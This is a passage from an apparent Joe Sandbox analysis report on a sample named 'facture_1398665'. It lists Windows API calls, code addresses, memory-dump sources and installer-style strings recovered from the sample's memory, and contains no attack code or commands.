      • Part of subcall function 0045783C: GetCurrentProcessId.KERNEL32(00000000,?,?,00000000,004578C2,?,01484140,00000000,0047DF65,?,01484140,?,01484141,0047C338), ref: 0045784B
      • Part of subcall function 0045783C: SendMessageW.USER32(00000000,0000C183,00000000,00000000), ref: 00457860
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetWindowThreadProcessId.USER32(00000000), ref: 0045787D
    • GetCurrentProcessId.KERNEL32(?,01484140,00000000,0047DF65,?,01484140,?,01484141,0047C338,?,?,?,?,01484140), ref: 00457886
    • GlobalFindAtomW.KERNEL32(00000000), ref: 0045789B
    • GetPropW.USER32(00000000,00000000), ref: 004578B2
      • Part of subcall function 0045783C: GetWindowThreadProcessId.USER32(00000000), ref: 00457842
      • Part of subcall function 0045783C: GetCurrentProcessId.KERNEL32(00000000,?,?,00000000,004578C2,?,01484140,00000000,0047DF65,?,01484140,?,01484141,0047C338), ref: 0045784B
      • Part of subcall function 0045783C: SendMessageW.USER32(00000000,0000C183,00000000,00000000), ref: 00457860
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetCurrentThreadId.KERNEL32(?,0047DB9B), ref: 0047A5B8
    • SetWindowsHookExW.USER32(00000003,0047A55C,00000000,00000000), ref: 0047A5C8
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,0047DB9B), ref: 0047A5E3
    • CreateThread.KERNEL32(00000000,000003E8,0047A500,00000000,00000000), ref: 0047A608
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • DeleteFileW.KERNEL32(00000000,00000000,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE5D9
    • DeleteFileW.KERNEL32(00000000,00000000,00000000,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE5E7
    • ReleaseMutex.KERNEL32(00000000,004FE640,004FE639,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668), ref: 004FE62A
    • CloseHandle.KERNEL32(00000000), ref: 004FE633
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AD13C: DeleteFileW.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD173
      • Part of subcall function 004AD13C: GetLastError.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD17B
    • GetLastError.KERNEL32 ref: 004DEAB8
    • GetLastError.KERNEL32 ref: 004DEAC2
    • GetTickCount.KERNEL32 ref: 004DEACC
    • Sleep.KERNEL32(00000032), ref: 004DEADC
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetLastActivePopup.USER32(?), ref: 0047BE74
    • IsWindowVisible.USER32(?), ref: 0047BE88
    • IsWindowEnabled.USER32(?), ref: 0047BE92
    • SetForegroundWindow.USER32(?), ref: 0047BE9C
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetCurrentProcess.KERNEL32(00000008), ref: 004D8C11
    • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 004D8C17
    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 004D8C39
    • CloseHandle.KERNEL32(00000000), ref: 004D8C4A
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 00437375
    • SelectObject.GDI32(00000000,018A002E), ref: 00437387
    • GetTextMetricsW.GDI32(00000000), ref: 00437392
    • ReleaseDC.USER32(00000000,00000000), ref: 004373A3
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetActiveWindow.USER32 ref: 00470E1A
    • EnumWindows.USER32(00470DDC), ref: 00470E33
    • GetCurrentThreadId.KERNEL32(00470DBC), ref: 00470E42
    • EnumThreadWindows.USER32(00000000,00470DBC), ref: 00470E48
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SysFreeString.OLEAUT32(?), ref: 004A07AE
      • Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1
      • Part of subcall function 00410F70: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,004214C8,00426440,00000000,0042648C,?,?,004214C8,00000001), ref: 00410F8F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SysFreeString.OLEAUT32(?), ref: 0048440A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • OffsetRect.USER32(?,00000001,00000001), ref: 00441D9E
    • OffsetRect.USER32(?,000000FF,000000FF), ref: 00441DDF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,?,?,?,?,00000000,?,00000000,004DB998), ref: 004DB95F
    Strings
    • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 004DB7CA
    • Failed to parse "reg" constant, xrefs: 004DB966
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00458068: ReleaseCapture.USER32 ref: 0045806B
    • SetCursor.USER32(00000000), ref: 0045937B
      • Part of subcall function 0045894C: SendMessageW.USER32(00000000,0000B02F,00000005,00000000), ref: 00458991
      • Part of subcall function 00465C20: ImageList_EndDrag.COMCTL32(?,-0000000C,00458D31), ref: 00465C3C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AAC74: SetEndOfFile.KERNEL32(?,?,004B8267,00000000,004B83F9,?,00000000,00000002,00000002), ref: 004AAC7B
    • FlushFileBuffers.KERNEL32(?), ref: 004B83C5
    Strings
    • NumRecs range exceeded, xrefs: 004B82BC
    • EndOffset range exceeded, xrefs: 004B82F3
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SendNotifyMessageW.USER32(0007016C,00000496,00002711,-00000001), ref: 004E0648
      • Part of subcall function 00480294: GetDC.USER32(00000000), ref: 004802A3
      • Part of subcall function 00480294: EnumFontsW.GDI32(?,00000000,00480280,00000000), ref: 004802CE
      • Part of subcall function 00480294: ReleaseDC.USER32(00000000,?), ref: 004802E6
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF6E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetWindowRect.USER32(00000000,-0000004C), ref: 004590A0
    • GetCursorPos.USER32(?), ref: 004590CB
      • Part of subcall function 00458E44: GetCursorPos.USER32(0050B10C), ref: 00458E65
      • Part of subcall function 00458E44: GetCursor.USER32 ref: 00458E81
      • Part of subcall function 00458E44: GetDesktopWindow.USER32 ref: 00458F73
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetForegroundWindow.USER32 ref: 004E6487
    • SetActiveWindow.USER32(?), ref: 004E649E
      • Part of subcall function 004E4640: PostMessageW.USER32(00000000,00000012,00000000,00000000), ref: 004E4648
    Strings
    • Will not restart Windows automatically., xrefs: 004E65CB
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • UnhandledExceptionFilter.KERNEL32(00000006), ref: 004048DE
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00404912
      • Part of subcall function 00408F00: TlsGetValue.KERNEL32(00000000,00000000,004030E2,00000002,00405109,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000), ref: 00408F25
      • Part of subcall function 00408F00: TlsGetValue.KERNEL32(00000000,004030E2,00000002,00405109,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,?), ref: 00408F36
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • LocalFileTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,004D6A78,?,00000000,004D6A89,?,00000000,004D6AD9), ref: 004D6A49
    • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000,00000000,004D6A78,?,00000000,004D6A89,?,00000000,004D6AD9), ref: 004D6A5D
    Strings
    • Extracting temporary file: , xrefs: 004D698E
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetThreadLocale.KERNEL32(00000000,00411187,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00411090
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004E06F4: GetWindowLongW.USER32(?,000000EC), ref: 004E0710
      • Part of subcall function 004E06F4: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004E073F
      • Part of subcall function 004E06F4: GetWindowLongW.USER32(?,000000EC), ref: 004E0754
      • Part of subcall function 004E06F4: SetWindowLongW.USER32(?,000000EC,00000000), ref: 004E077A
      • Part of subcall function 004E06F4: ShowWindow.USER32(?,00000005), ref: 004E0793
      • Part of subcall function 004E06F4: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057), ref: 004E07B4
      • Part of subcall function 0047BD0C: SetActiveWindow.USER32(?), ref: 0047BD2E
      • Part of subcall function 0047BD0C: ShowWindow.USER32(00000000,00000009), ref: 0047BD51
      • Part of subcall function 0047BD0C: IsWindowEnabled.USER32(00000000), ref: 0047BD73
      • Part of subcall function 0047BD0C: DefWindowProcW.USER32(?,00000112,0000F120,00000000), ref: 0047BD8F
      • Part of subcall function 0047BD0C: SetWindowPos.USER32(?,00000000,00000000,?,?,0047B69E,00000000), ref: 0047BDDB
      • Part of subcall function 0047BD0C: SetFocus.USER32(00000000), ref: 0047BE29
    • SetActiveWindow.USER32(?), ref: 004CA9BC
    Strings
    • Failed to proceed to next wizard page; aborting., xrefs: 004CA97D
    • Failed to proceed to next wizard page; showing wizard., xrefs: 004CA991
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • PeekMessageW.USER32(?,00000000,00000203,00000203,00000000), ref: 00468C2E
      • Part of subcall function 0045B8C4: GetCursorPos.USER32 ref: 0045B946
      • Part of subcall function 00468240: GetDCEx.USER32(00000000,00000000,00000412), ref: 0046827B
      • Part of subcall function 0045BF8C: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0045BFE9
      • Part of subcall function 0045BF8C: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0045C0DD
      • Part of subcall function 0045BF8C: MapWindowPoints.USER32(00000000,00000000,?,00000001), ref: 0045C126
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(?,004D9BAC,004D75FA,?,00000001,00000000,00000000,004D9BCA,?,?), ref: 004D9B93
    Strings
    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004D9B1D
    • %s\%s_is1, xrefs: 004D9B3B
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • UnhandledExceptionFilter.KERNEL32(00000006), ref: 0040474A
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00404787
      • Part of subcall function 00408F00: TlsGetValue.KERNEL32(00000000,00000000,004030E2,00000002,00405109,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000), ref: 00408F25
      • Part of subcall function 00408F00: TlsGetValue.KERNEL32(00000000,004030E2,00000002,00405109,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,?), ref: 00408F36
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040F9D5), ref: 0040F96C
    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 0040F972
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • ShellExecuteExW.SHELL32(0000003C), ref: 004AFDA4
    • GetLastError.KERNEL32(0000003C,00000000,004AFDEC,?,?,?,00000001), ref: 004AFDB3
      • Part of subcall function 004AF9A8: WaitForInputIdle.USER32(00000001,00000032), ref: 004AF9D4
      • Part of subcall function 004AF9A8: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004AF9F6
      • Part of subcall function 004AF9A8: GetExitCodeProcess.KERNEL32(00000001,?), ref: 004AFA07
      • Part of subcall function 004AF9A8: CloseHandle.KERNEL32(00000001), ref: 004AFA27
      • Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
